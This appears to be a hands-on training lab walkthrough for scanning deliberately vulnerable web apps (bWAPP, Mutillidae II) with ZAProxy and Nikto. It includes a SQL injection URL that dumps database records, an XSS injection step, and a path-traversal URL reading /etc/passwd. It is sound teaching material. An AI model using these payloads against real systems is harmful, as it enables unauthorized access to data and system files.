🔬Web App Scanning
Lab 1 - ZAProxy
🔬 Scanning Web Application with ZAProxy
Target IP:
192.192.29.3
Scan and identify a vulnerable web app (bWAPP) with ZAProxy
ip -br -c a
eth1@if203734 UP 192.192.29.2/24
nmap -sS -sV 192.192.29.3
Start
owasp-zap
from the start menuUse
Manual Explore
and input the URLhttp://192.192.29.3/
Launch Browser to open the browser session with the ZAP HUB

Login to the web app with
bee
:bug
credentialsset the security level to
low

Try some HTML and SQL Injection or other bugs from the
https://192.192.29.3/portal.php
page
ZAProxy
Configure authenticated session in ZAProxy



Enable
Forced User mode

Include in Context
the Sitehttps://192.192.29.3/
and confirm withOK

Run a
Spider
attack on the site, select thebee
user and Start the scan


Run an
Active Scan
on the site, select thebee
user and Start the scan

In the
Alerts
tab check the 🚩High
risk Alerts

Try to navigate to
https://192.192.29.3/htmli_stored.php
, inject theXSS
(Cross-site Scripting) payload and Submit itThe XSS payload will be triggered


Using the
ZAP HUD
, Site Alerts can be accessed. Every vulnerability is clickable and can be directly tried via the URL



Try a SQL Injection attack by opening this link
http://192.210.141.3/sqli_1.php?action=search&title=ZAP'+OR+'1'%3D'1'+--+
The table records will be dumped on the web page

Lab 2 - Nikto
🔬 Scanning Web Application with Nikto
Target IP:
192.157.60.3
Scan and identify web app vulnerabilities (Multillidae II) with Nikto
LFI
ip -br -c a
eth1@if203734 UP 192.157.60.2/24
nmap -sS -sV 192.157.60.3
Open the browser and navigate to
http://192.157.60.3/
Nikto
In the Bash terminal run
nikto
and output the results to a file
nikto -h http://192.157.60.3 -o niktoscan-192.157.60.3.txt

Scan the target web app for Local File Inclusion (LFI) vulnerability by copying the link from the browser
http://192.157.60.3/index.php?page=arbitrary-file-inclusion.php
output to an
HTML
file
nikto -h http://192.157.60.3/index.php?page=arbitrary-file-inclusion.php -Tuning 5 -o nikto.html -Format htm

firefox nikto.html


The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host
View the contents of the
passwd
file of the target machinehttp://192.157.60.3/index.php/index.php?page=../../../../../../../../../../etc/passwd

Last updated
Was this helpful?